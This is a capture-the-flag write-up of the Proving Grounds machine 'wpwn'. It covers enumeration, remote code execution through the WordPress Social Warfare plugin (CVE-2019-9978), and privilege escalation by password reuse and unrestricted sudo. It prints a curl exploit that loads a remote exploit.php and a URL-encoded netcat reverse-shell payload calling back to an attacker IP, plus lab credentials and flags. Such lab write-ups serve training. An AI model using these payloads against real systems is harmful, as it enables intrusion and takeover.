Hi amazing hackers from around the world, back again with another write up of a box. This time it’s from OffSec’s Proving Grounds. If you would like to check out more write ups please do check my GitLab repository
Enumeration
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Basic information that you’ll get.
Web
- Apache 2.4.38
- WordPress 5.5
- robots.txt contains :
/secret -> 404
# haha, just kidding. Focus on real stuff ma boi
Looks like it’s just a fake robots.txt, that’s fine keep enumerating!
FeroxBuster
FeroxBuster is a tool to discover directories and files on a server, it’s pretty similar to GoBuster but it’s much more faster and it has emojis!
- Found
/wordpress
200 3l 5w 23c http://192.168.85.123/
301 9l 28w 320c http://192.168.85.123/wordpress
- Now that we know we’re running WordPress we can run another tool.
WPSCAN
wpscan is a tool made by wpscanteam to enumerate and test the security of the CMS WordPress.
- 1 user identified,
admin
- Plugins detected
social-warfare
version 3.5.2
Exploit
Now we have some information of our target, lets do some research!
- Research indicates the plugin is vulnerable to CVE-2019–9978
- Found this exploit which explains how it works and what is vulnerable
curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=hostname&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"
- We’ll see the hostname in the response
wpwn
<!DOCTYPE html>
<html lang="en-US">
<head>
- Let’s get a reverse shell.
- Payload needs to be URL encoded.
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff
curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"pwncat is a tool similar to netcat, but it has more features than netcat.[15:09:39] Welcome to pwncat 🐈! __main__.py:153
[15:10:28] received connection from 192.168.85.123:54858 bind.py:76
[15:10:31] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:504
[15:10:34] 192.168.85.123:54858: registered new host w/ db
Privilege Escalation
Now that we have a shell in the machine, it’s time to escalate our privileges!
- We are user www-data, need password for
sudo -l
- Found MySQL credentials for DB.
/** MySQL database username */
define( 'DB_USER', 'wp_user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );wp_user:R3&]vzhHmMn9,:-5
- Found hash for admin in wp_users table.
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1 |
+------------+------------------------------------+
- Hash is Wordpress, mode 400
- While we’re trying to crack the password, we should look around more.
- Found local.txt in
/var/www
80d2c0fa4fec51cad65e486bbecf34ab
One thing that I like to check is that usually the DB password is reused for the user password
- We have one user which is
takis
- DB password is reused for user
takis
. We are now user takis. - Check
sudo -l
User takis may run the following commands on wpwn: (ALL) NOPASSWD: ALL
We’ll look at that, we don’t even need to find another vector to escalate to root.
- We can run sudo on anything, run
sudo bash
to gain root privileges. proof.txt
in /roota6f62db372a1a76f723cc2a8e1594ec6
And that’s all we’re root!